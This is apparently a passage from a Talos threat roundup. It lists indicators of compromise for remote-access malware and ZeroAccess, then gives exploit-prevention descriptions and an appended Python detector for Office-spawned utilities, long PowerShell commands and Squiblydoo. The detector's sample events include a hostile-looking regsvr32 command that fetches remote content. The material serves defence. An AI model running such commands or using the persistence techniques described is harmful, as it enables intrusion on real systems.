1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ce01c704d96a4bead8b026dd8a03ac57
1
<HKCU>\SOFTWARE\CE01C704D96A4BEAD8B026DD8A03AC57
Value Name: [kl]
1
<HKCU>\SOFTWARE\472A5309AB5DE1FF2D75A3837A9BDFEA 1
Mutexes | Occurrences
<32 random hex characters> 15
a031cf151de510a7d18304b0d730b67a 6
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
41[.]200[.]44[.]39 6
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
siradj2000[.]no-ip[.]biz 6
maxe21[.]no-ip[.]biz 3
afafaf12319[.]ddns[.]net 1
cracker[.]ddns[.]net 1
tytomaser32hegmgmh[.]ddns[.]net 1
mohamedmosad[.]ddns[.]net 1
johnsinse[.]no-ip[.]biz 1
lelpeep[.]freedynamicdns[.]org 1
explorer24[.]no-ip[.]biz 1
jihad100[.]no-ip[.]biz 1
Files and or directories created | Occurrences
\.exe 21
\TEMP\.exe 21
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\<exe name>.log 21
%LOCALAPPDATA%\Microsoft\CLR_v2.0_32\UsageLogs\.exe.log 20
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 6
%TEMP%\explore.exe 6
%TEMP%\server.exe 4
%APPDATA%\server.exe 3
\REGISTRY\MACHINE\SOFTWARE\Classes\exefile 1
%APPDATA%\systam32.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\a4904129147bf5c806da7805f85c24e9.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\0dfae8ceb37375efcae4cbebada0b8a8.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\59ae2ab03a61f8613a2daa51b765ea29.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\e953a9bafa6007844ef7a85fd7d0276f.exe 1
%TEMP%\Web service.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\32020362fdbe7f5e024441956aa398cf.exe 1

File Hashes

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.ZeroAccess-9854205-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 27 samples
Registry Keys | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: DeleteFlag
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: DeleteFlag
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: DeleteFlag
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BROWSER
Value Name: Start
20
<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32
Value Name: ThreadingModel
20
<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32 20
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
20
<HKLM>\SOFTWARE\CLASSES\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\INPROCSERVER32 20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Type
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: ErrorControl
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: Type
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: ErrorControl
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: Type
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: ErrorControl
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: DeleteFlag
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Type
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: ErrorControl
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Type
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: ErrorControl
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000010
Value Name: PackedCatalogItem
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000009
Value Name: PackedCatalogItem
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000008
Value Name: PackedCatalogItem
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000007
Value Name: PackedCatalogItem
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000006
Value Name: PackedCatalogItem
20
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000005
Value Name: PackedCatalogItem
20
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
64[.]210[.]151[.]32 20
213[.]108[.]252[.]185 20
83[.]133[.]123[.]20 13
184[.]253[.]253[.]254 11
130[.]185[.]108[.]132 10
203[.]247[.]253[.]254 10
180[.]246[.]253[.]254 10
46[.]246[.]253[.]254 10
88[.]251[.]253[.]254 10
98[.]251[.]253[.]254 10
27[.]252[.]253[.]254 10
79[.]252[.]253[.]254 10
108[.]245[.]253[.]254 9
94[.]245[.]253[.]254 9
220[.]244[.]253[.]254 9
89[.]244[.]253[.]254 9
109[.]243[.]253[.]254 9
171[.]242[.]253[.]254 9
88[.]241[.]253[.]254 9
74[.]242[.]253[.]254 7
98[.]206[.]113[.]247 6
176[.]198[.]171[.]47 6
98[.]222[.]241[.]53 5
79[.]114[.]164[.]11 5
188[.]11[.]235[.]62 5

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
promos[.]fling[.]com 20
Files and or directories created | Occurrences
\$Recycle.Bin\S-1-5-18 20
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f 20
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\@ 20
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\L 20
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\U 20
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\n 20
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f 20
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\@ 20
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\L 20
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\U 20
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\n 20
\$Recycle.Bin\S-1-5-21-1160359183-2529320614-3255788068-500\$bc873181c718236380cd637b8be3cfa0\@ 20
\$Recycle.Bin\S-1-5-21-1160359183-2529320614-3255788068-500\$bc873181c718236380cd637b8be3cfa0\n 20

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Trickbot malware detected - (16303)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Process hollowing detected - (8856)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected - (2435)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
A Microsoft Office process has started a windows utility. - (2259)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many different malware campaigns and families.
Crystalbit-Apple DLL double hijack detected - (1155)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a DLL double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
Squiblydoo application whitelist bypass attempt detected. - (520)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker-controlled server.
Dealply adware detected - (466)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Kovter injection detected - (445)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Bazar Loader activity detected - (119)
A malicious document used in combination with rundll32.exe has been detected. This is a known technique of Bazar loader. Bazar has been observed delivering variants of Trickbot.
Gamarue malware detected - (107)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
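As an added example that is not part of the Talos post, the Python below encodes three of the behaviours described in this section as rules over process-creation events: an Office process starting a Windows utility (which also covers the document-plus-rundll32.exe pairing noted for Bazar loader), an excessively long PowerShell command line, and regsvr32.exe pointed at remotely hosted content (Squiblydoo). The event field names, the 1024-character threshold, and the sample events are constructed assumptions, not Cisco AMP's own logic or telemetry.

```python
"""Triage rules for three behaviours named in the exploit-prevention section,
run over constructed Sysmon-style process-creation events."""
import re

# Process names taken from the page; extend both sets for your environment.
OFFICE_PARENTS = {"winword.exe", "excel.exe"}
WINDOWS_UTILITIES = {"powershell.exe", "cmd.exe", "regsvr32.exe", "rundll32.exe"}
# Assumed threshold: routine admin scripts rarely pass more than 1 KiB of arguments.
LONG_COMMAND_LINE = 1024
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


def image_name(path: str) -> str:
    """Lowercase file name of a Windows (or POSIX) image path."""
    return re.split(r"[\\/]", path)[-1].lower()


def office_spawned_utility(event: dict) -> bool:
    """WINWORD.exe / EXCEL.exe started cmd, PowerShell, regsvr32 or rundll32."""
    return (image_name(event["parent_image"]) in OFFICE_PARENTS
            and image_name(event["image"]) in WINDOWS_UTILITIES)


def long_powershell(event: dict, threshold: int = LONG_COMMAND_LINE) -> bool:
    """PowerShell launched with an unusually long argument string (possible obfuscation)."""
    return (image_name(event["image"]) == "powershell.exe"
            and len(event["command_line"]) > threshold)


def squiblydoo_regsvr32(event: dict) -> bool:
    """regsvr32.exe whose command line references content on a remote URL."""
    return (image_name(event["image"]) == "regsvr32.exe"
            and REMOTE_URL.search(event["command_line"]) is not None)


RULES = {
    "office_spawned_utility": office_spawned_utility,
    "long_powershell": long_powershell,
    "squiblydoo_regsvr32": squiblydoo_regsvr32,
}


def evaluate(events: list) -> list:
    """Return (event index, names of matching rules) for every event that trips a rule."""
    hits = []
    for idx, event in enumerate(events):
        matched = [name for name, rule in RULES.items() if rule(event)]
        if matched:
            hits.append((idx, matched))
    return hits


# Constructed events, not real telemetry. Field names mirror Sysmon Event ID 1.
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",          # user opens a document: benign
     "image": OFFICE + r"\WINWORD.EXE",
     "command_line": '"WINWORD.EXE" /n report.docx'},
    {"parent_image": OFFICE + r"\WINWORD.EXE",             # macro spawns hidden PowerShell
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -c " + "A" * 1500},
    {"parent_image": OFFICE + r"\EXCEL.EXE",               # regsvr32 pointed at remote content
     "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": "regsvr32.exe /s /i:https://example.invalid/x"},
    {"parent_image": r"C:\Windows\System32\msiexec.exe",  # installer registering a local DLL
     "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r"regsvr32.exe /s C:\Program Files\Vendor\component.dll"},
]


def main() -> None:
    for idx, rules in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(rules)}")


if __name__ == "__main__":
    main()
```

The benign WINWORD launch and the installer's local regsvr32 registration produce no hits, which is the point of keying on the parent/child pair and the remote URL rather than on the utility name alone.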